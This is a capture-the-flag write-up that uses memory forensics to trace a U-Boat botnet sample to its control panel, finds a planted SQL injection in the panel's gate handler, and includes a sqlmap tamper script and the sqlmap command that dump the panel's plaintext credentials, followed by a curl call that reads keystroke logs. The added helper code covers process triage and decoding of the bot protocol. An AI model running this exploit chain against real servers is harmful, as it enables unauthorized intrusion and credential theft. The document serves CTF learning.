So, we have a memory dump. Let's spin up
[volatility](https://github.com/volatilityfoundation/volatility)!

```bash
% python vol.py imageinfo -f ../20200724.mem
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/ilyaluk/ctf/cybrics20/botmaster/20200724.mem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x8276cc68L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x8276dd00L
KPCR for CPU 1 : 0x807cc000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2020-07-24 15:44:22 UTC+0000
Image local date and time : 2020-07-24 18:44:22 +0300

% python vol.py --profile=Win7SP1x86_23418 -f ../20200724.mem pstree
Volatility Foundation Volatility Framework 2.6.1
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x83d3acf0:System 4 0 84 549 2020-07-24 15:39:17 UTC+0000  
. 0x84405418:smss.exe 228 4 2 30 2020-07-24 15:39:17 UTC+0000  
0x843a4638:csrss.exe 308 288 9 419 2020-07-24 15:39:23 UTC+0000  
0x84b14d28:wininit.exe 352 288 5 81 2020-07-24 15:39:24 UTC+0000  
. 0x84b46250:services.exe 456 352 7 200 2020-07-24 15:39:26 UTC+0000  
.. 0x84bf0b08:svchost.exe 812 456 20 469 2020-07-24 15:39:31 UTC+0000  
... 0x84330508:audiodg.exe 960 812 6 131 2020-07-24 15:39:33 UTC+0000  
.. 0x84c42b70:svchost.exe 1036 456 23 520 2020-07-24 15:39:34 UTC+0000  
.. 0x84d00a48:svchost.exe 1436 456 24 381 2020-07-24 15:39:39 UTC+0000  
.. 0x84cbf7e0:svchost.exe 1316 456 18 315 2020-07-24 15:39:37 UTC+0000  
.. 0x84d943b8:svchost.exe 1836 456 5 98 2020-07-24 15:39:44 UTC+0000  
.. 0x84e7f770:SearchIndexer. 2060 456 11 633 2020-07-24 15:39:59 UTC+0000  
... 0x83f4fd28:SearchFilterHo 1732 2060 6 93 2020-07-24 15:43:25 UTC+0000  
... 0x843ac030:SearchProtocol 2836 2060 7 278 2020-07-24 15:43:25 UTC+0000  
.. 0x83f4b648:svchost.exe 2224 456 12 340 2020-07-24 15:41:46 UTC+0000  
.. 0x84b82030:svchost.exe 564 456 11 360 2020-07-24 15:39:29 UTC+0000  
... 0x83f72550:WmiPrvSE.exe 716 564 9 123 2020-07-24 15:41:49 UTC+0000  
... 0x83fe2d28:WmiPrvSE.exe 3512 564 7 167 2020-07-24 15:42:40 UTC+0000  
.. 0x84b98358:svchost.exe 692 456 8 275 2020-07-24 15:39:31 UTC+0000  
.. 0x84d34978:taskhost.exe 1996 456 8 187 2020-07-24 15:39:45 UTC+0000  
.. 0x84bf9c70:svchost.exe 844 456 19 397 2020-07-24 15:39:32 UTC+0000  
... 0x84e25030:dwm.exe 924 844 3 67 2020-07-24 15:39:48 UTC+0000  
.. 0x83f5e198:wmpnetwk.exe 284 456 13 435 2020-07-24 15:41:47 UTC+0000  
.. 0x83efcac0:sppsvc.exe 336 456 4 144 2020-07-24 15:41:46 UTC+0000  
... 0x84b13030:csrss.exe 344 336 8 236 2020-07-24 15:39:24 UTC+0000  
.... 0x83fc5998:conhost.exe 2272 344 2 35 2020-07-24 15:44:21 UTC+0000  
... 0x84b12418:winlogon.exe 380 336 5 137 2020-07-24 15:39:25 UTC+0000  
.. 0x84bfebb8:svchost.exe 872 456 38 1060 2020-07-24 15:39:32 UTC+0000  
... 0x83fee7b8:wuauclt.exe 3908 872 5 92 2020-07-24 15:42:55 UTC+0000  
.. 0x84c60348:svchost.exe 1132 456 16 384 2020-07-24 15:39:35 UTC+0000  
.. 0x84b8d470:VBoxService.ex 628 456 12 117 2020-07-24 15:39:30 UTC+0000  
.. 0x84ca0030:spoolsv.exe 1272 456 12 296 2020-07-24 15:39:37 UTC+0000  
. 0x84b4d030:lsass.exe 464 352 9 575 2020-07-24 15:39:26 UTC+0000  
. 0x84b4e928:lsm.exe 472 352 11 146 2020-07-24 15:39:26 UTC+0000  
0x84dee408:explorer.exe 1388 468 42 1124 2020-07-24 15:39:48 UTC+0000  
. 0x84e8e908:bot.exe 2444 1388 4 142 2020-07-24 15:40:45 UTC+0000  
. 0x84f19360:RamCapture.exe 3296 1388 3 63 2020-07-24 15:44:21 UTC+0000  
. 0x84e750e0:VBoxTray.exe 1988 1388 13 171 2020-07-24 15:39:53 UTC+0000  
```

Huh, `bot.exe`. Seems suspicious. Let's dump the binary and take a look:  
```bash
% python vol.py --profile=Win7SP1x86_23418 -f ../20200724.mem procdump -p 2444 -D dump
Volatility Foundation Volatility Framework 2.6.1
Process(V) ImageBase Name Result
---------- ---------- -------------------- ------
0x84e8e908 0x011d0000 bot.exe OK: executable.2444.exe
```
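Spotting `bot.exe` by eye works on a tree this size; on a busier host it helps to script the first pass. The following Python is an added example, not part of the original writeup: it parses rows of the `pstree` listing above (a constructed excerpt is embedded as sample input), flags process names that are not in a constructed baseline for a clean Windows 7 guest with VirtualBox Guest Additions, and flags children whose start time precedes that of their listed parent. The second check is a PID-reuse caveat worth knowing: in this dump `csrss.exe` 344 and `winlogon.exe` 380 hang under `sppsvc.exe` 336 only because PID 336 was recycled after their real parent exited (they started two minutes before `sppsvc.exe` did), so that tree edge is an artifact, not a sign of injection.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Set, Tuple

# Excerpt of the pstree listing above, with column padding collapsed as in this post;
# embedded here as sample input.
PSTREE_SAMPLE = """\
Volatility Foundation Volatility Framework 2.6.1
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x83d3acf0:System 4 0 84 549 2020-07-24 15:39:17 UTC+0000
. 0x84405418:smss.exe 228 4 2 30 2020-07-24 15:39:17 UTC+0000
0x843a4638:csrss.exe 308 288 9 419 2020-07-24 15:39:23 UTC+0000
0x84b14d28:wininit.exe 352 288 5 81 2020-07-24 15:39:24 UTC+0000
. 0x84b46250:services.exe 456 352 7 200 2020-07-24 15:39:26 UTC+0000
.. 0x83efcac0:sppsvc.exe 336 456 4 144 2020-07-24 15:41:46 UTC+0000
... 0x84b13030:csrss.exe 344 336 8 236 2020-07-24 15:39:24 UTC+0000
... 0x84b12418:winlogon.exe 380 336 5 137 2020-07-24 15:39:25 UTC+0000
0x84dee408:explorer.exe 1388 468 42 1124 2020-07-24 15:39:48 UTC+0000
. 0x84e8e908:bot.exe 2444 1388 4 142 2020-07-24 15:40:45 UTC+0000
. 0x84f19360:RamCapture.exe 3296 1388 3 63 2020-07-24 15:44:21 UTC+0000
. 0x84e750e0:VBoxTray.exe 1988 1388 13 171 2020-07-24 15:39:53 UTC+0000
"""

# Constructed baseline: process names expected on a clean Windows 7 guest with
# VirtualBox Guest Additions. Tune it to the environment being examined.
BASELINE: Set[str] = {
    "System", "smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe",
    "lsm.exe", "winlogon.exe", "svchost.exe", "audiodg.exe", "spoolsv.exe",
    "taskhost.exe", "dwm.exe", "explorer.exe", "conhost.exe", "wuauclt.exe",
    "sppsvc.exe", "wmpnetwk.exe", "WmiPrvSE.exe", "SearchIndexer.exe",
    "SearchFilterHost.exe", "SearchProtocolHost.exe", "VBoxService.exe", "VBoxTray.exe",
}

# One pstree row: optional depth dots, "0xOFFSET:name", four integer columns, timestamp.
LINE_RE = re.compile(
    r"^(?P<depth>\.*)\s*0x(?P<offset>[0-9a-fA-F]+):(?P<name>\S+)"
    r"\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<thds>\d+)\s+(?P<hnds>\d+)"
    r"\s+(?P<time>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) UTC\+0000\s*$"
)


@dataclass
class Proc:
    offset: int
    name: str
    pid: int
    ppid: int
    started: datetime


def parse_pstree(text: str) -> List[Proc]:
    """Turn pstree rows into Proc records; banner, header and separator lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs.append(Proc(int(m["offset"], 16), m["name"], int(m["pid"]), int(m["ppid"]),
                              datetime.strptime(m["time"], "%Y-%m-%d %H:%M:%S")))
    return procs


def unknown_processes(procs: List[Proc],
                      baseline: Set[str] = BASELINE) -> List[Tuple[str, int, Optional[str]]]:
    """Processes whose name is not in the baseline, with the parent's name if it is in the dump."""
    # pstree prints _EPROCESS.ImageFileName, which is truncated (to 14 characters in this
    # listing, e.g. "VBoxService.ex"), so truncate the baseline names the same way.
    known = {n[:14] for n in baseline}
    by_pid = {p.pid: p for p in procs}
    flagged = []
    for p in procs:
        if p.name not in known:
            parent = by_pid.get(p.ppid)
            flagged.append((p.name, p.pid, parent.name if parent else None))
    return flagged


def pid_reuse_suspects(procs: List[Proc]) -> List[Tuple[str, int, str, int]]:
    """Children that started before their listed parent: the PPID was recycled, so the
    tree edge reflects PID reuse rather than a real parent/child relationship."""
    by_pid = {p.pid: p for p in procs}
    return [(p.name, p.pid, by_pid[p.ppid].name, p.ppid)
            for p in procs
            if p.ppid in by_pid and p.started < by_pid[p.ppid].started]


if __name__ == "__main__":
    procs = parse_pstree(PSTREE_SAMPLE)
    for name, pid, parent in unknown_processes(procs):
        print(f"not in baseline: {name} (pid {pid}, parent {parent})")
    for name, pid, pname, ppid in pid_reuse_suspects(procs):
        print(f"pid reuse: {name} ({pid}) started before listed parent {pname} ({ppid})")
```

Run against the full listing, the baseline check surfaces `bot.exe` and `RamCapture.exe` (the latter being the acquisition tool that took the image, so its presence is expected) and the time check surfaces the two `sppsvc.exe` "children". Feeding it the output of `pstree` on another profile only needs the baseline adjusted.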

While skimming through the strings in this binary we stumble across something
that looks like a C&C server IP, some URLs and HTTP implementation strings:  
```  
95.217.215.227  
/gate  
localhost  
/UBoat/gate.php  
X-Token  
X-Id  
POST  
HTTP Response Code  
%s %s HTTP/1.0  
Content-Type: application/x-www-form-urlencoded  
```

As it turns out, this is an open-source botnet named
[U-Boat](https://github.com/UBoat-Botnet/UBoat).

I ran a small [Dirb](https://tools.kali.org/web-applications/dirb) scan that
yielded several pages, and the most interesting one was `/login` (of course, the
same result could be achieved by reading the [panel source
code](https://github.com/UBoat-Botnet/UBoat-Panel) or by pure guessing):

![](https://i.imgur.com/E34SL0W.png)

Oh, [download for my friends](http://95.217.215.227/Panel_for_friends.zip).
How cool is that? Let's download this and check for diffs between it and the
latest version from the repo:

```  
% diff -rupw UBoat-Panel Panel_for_friends  
```

The most suspicious patch occurs around the crafting of an SQL query:

![](https://i.imgur.com/gISCIQn.png)

That looks like an intentional SQL injection. So, how do we trigger it? This
code handles heartbeats from bots; it is called, for instance, from the main
`/gate` handler.

```php
$heart = $this->loadHelper('heartbeat');
$encrypted = $_POST['x'];
$key = getallheaders()['X-Token'];
$decrypted = $this->BoatDecryptionRoutine($encrypted, $key);

$commandData = null;
$commandType = null;

$commandId = $this->ParseCommand($decrypted, $commandData, $commandType);

$output = $this->CreateCommand(-1, -1, 'This will terminate the app.');

switch ($commandType) {
    case 0:
        //it's a join
        //handle the db insertion
        $ip = null;
        if (! empty($_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (! empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $_dbcommand = $commandData;
        $_dbcommand .= '@'.$ip;

        $ip = $geo_helper->GetCountryFromAddress($ip);
        $_dbcommand .= '@'.$ip['country_name'].'@'.$ip['country_code'];
        $botId = $heart->beat($heart->splitToArray($_dbcommand));

        $output = $this->CreateCommand(-1, 0, $botId);

        break;
```

Simple encryption is utilized here:

```php
private function ParseCommand($rawData, &$data, &$commandType)
{
    $splitInfo = explode('|', $rawData);
    $data = urldecode($splitInfo[2]);
    $commandType = (int) $splitInfo[1];

    return (int) $splitInfo[0];
}

private function XORInputKey($input, $key, $inputLength, $keyLength)
{
    $output = [];
    for ($i = 0; $i < $inputLength; ++$i) {
        $output[] = $input[$i] ^ $key[$i % $keyLength];
    }

    return $output;
}

//we'll use this xor shit kk

private function BoatDecryptionRoutine($input, $key)
{
    $output = str_split(urldecode($input));
    $key = str_split(urldecode($key));
    $output = $this->XORInputKey($output, $key, count($output), count($key));

    return implode($output);
}
```
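To read what a bot actually sends, for instance when reviewing `/gate` traffic captured from the infected host, it helps to have the three PHP routines above in a scripting language. The following Python port is an added example, not code from the panel or the original writeup: it URL-decodes the body and the `X-Token` header, XORs them with the key cycled (as `XORInputKey` does), splits the result as `ParseCommand` does, and then splits the join record on `@`, which is an assumption about `splitToArray` based on how the gate handler builds the record (`...@ip@country_name@country_code`). `suspicious_fields` is a constructed log-review heuristic for the panel's database: a join record is a GUID plus OS and hardware strings, so SQL metacharacters in any field deserve a second look. Note also that the handler appends an `$ip` taken from the client-supplied `Client-IP` / `X-Forwarded-For` headers to that same record before it reaches `beat()`, so the stored address is whatever the bot claims it to be.

```python
from itertools import cycle
from typing import List, Tuple
from urllib.parse import quote, unquote_plus


def _urldecode(s: str) -> bytes:
    # PHP urldecode(): '+' becomes a space and %XX escapes are expanded. Work in
    # bytes because the XOR output is arbitrary binary, not text.
    return unquote_plus(s, encoding="latin-1").encode("latin-1")


def boat_decrypt(x_body: str, x_token: str) -> str:
    """Port of BoatDecryptionRoutine + XORInputKey: urldecode body and key, XOR with the key cycled."""
    data, key = _urldecode(x_body), _urldecode(x_token)
    if not key:
        raise ValueError("empty X-Token key")  # the PHP version divides by zero here
    return bytes(a ^ b for a, b in zip(data, cycle(key))).decode("latin-1")


def boat_encrypt(plaintext: str, x_token: str) -> str:
    """XOR is its own inverse, so this yields the URL-encoded body a bot would POST as x=..."""
    key = _urldecode(x_token)
    raw = bytes(a ^ b for a, b in zip(plaintext.encode("latin-1"), cycle(key)))
    return quote(raw, safe="")


def parse_command(decrypted: str) -> Tuple[int, int, str]:
    """Port of ParseCommand: 'id|type|data', with the data field urldecoded once more."""
    parts = decrypted.split("|")
    if len(parts) < 3:
        raise ValueError("malformed command: %r" % decrypted)
    return int(parts[0]), int(parts[1]), unquote_plus(parts[2])


def split_join_record(data: str) -> List[str]:
    # Assumption: the heartbeat helper's splitToArray() splits on '@', which is how
    # the gate handler builds the record ('...@ip@country_name@country_code').
    return data.split("@")


SQL_META = ("'", '"', ";", "--", "/*")


def suspicious_fields(fields: List[str]) -> List[str]:
    """Constructed log-review heuristic: join fields are a GUID plus OS/hardware strings,
    so SQL metacharacters in any of them deserve a second look."""
    return [f for f in fields if any(m in f for m in SQL_META)]


# Constructed join message: command id 0, type 0 (a join), then the '@'-separated host fields.
SAMPLE_JOIN = ("0|0|{00000000-0000-0000-0000-000000000000}@Microsoft Windows 7"
               "@Intel(R) Core(TM)@2.90GHz@VirtualBox Graphics Adapter@false@1")
SAMPLE_TOKEN = "1"

if __name__ == "__main__":
    body = boat_encrypt(SAMPLE_JOIN, SAMPLE_TOKEN)  # what goes on the wire as x=...
    cmd_id, cmd_type, data = parse_command(boat_decrypt(body, SAMPLE_TOKEN))
    fields = split_join_record(data)
    print(cmd_id, cmd_type, fields)
    print("suspicious:", suspicious_fields(fields))
```

Because the key is the `X-Token` header sent alongside the body, anyone holding a capture of the request holds everything needed to decode it; the "encryption" here is obfuscation, not confidentiality. The round trip through `boat_encrypt` exists so that test inputs can be built without a live bot.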

Let's write a simple tamper script for sqlmap:

```python
# sqlmap tamper script: wrap the injection payload in a U-Boat "join" message
# and XOR it with the single-byte key we send in the X-Token header ('1').


def xor(data):
    # The panel XORs the URL-decoded body with the key, byte by byte, cycling the
    # key; with a one-character key that is one XOR per character.
    return ''.join(chr(ord(i) ^ ord('1')) for i in data)


def tamper(payload, **kwargs):
    # Command id 0, type 0 (join), then the '@'-separated host fields; the payload
    # lands in the last field, which is what reaches the patched SQL query.
    x = ('0|0|{bbed3e02-0b41-11e3-8249-806e6f6e6963}@Microsoft Windows 8'
         '@Intel(R) Core(TM)@2.90GHz@NVIDIA GeForce GTX [email protected]@false@1'
         + (payload or ''))
    return xor(x)
```

From `src/uboat.sql` we know that the password is stored in plaintext in the
`user` table of the `uboat` DB. So, this should do the trick:

```
% sqlmap -u 'http://95.217.215.227/gate' --headers='X-Token:1' --data "x=1" -p "x" --method POST --tamper tamper.py -D uboat -T user -C username,password --dump
Database: uboat
Table: user
[1 entry]
+----------+-------------+
| username | password    |
+----------+-------------+
| root     | p@$$w0Rd123 |
+----------+-------------+
```

Neat, let's login to the dashboard:

![](https://i.imgur.com/feXSPZr.png)

The VirtualBox machine on Win7 looks like what we need. For some reason, I could
not use U-Boat's UI for reading logs (right-click on bot → read logs), so
let's poke around with curl instead, using our knowledge of the panel source code:

```
% curl 'http://95.217.215.227/tasks/readLog' \
    --data 'bot=57' \
    -H 'Cookie: PHPSESSID=1c391ad1cc0663425b41b46c75db61db'

Left Windows
rnotepad[Enter]

cybrics{be_safe_from_bots}[Enter]

[Enter]
```

> `cybrics{be_safe_from_bots}`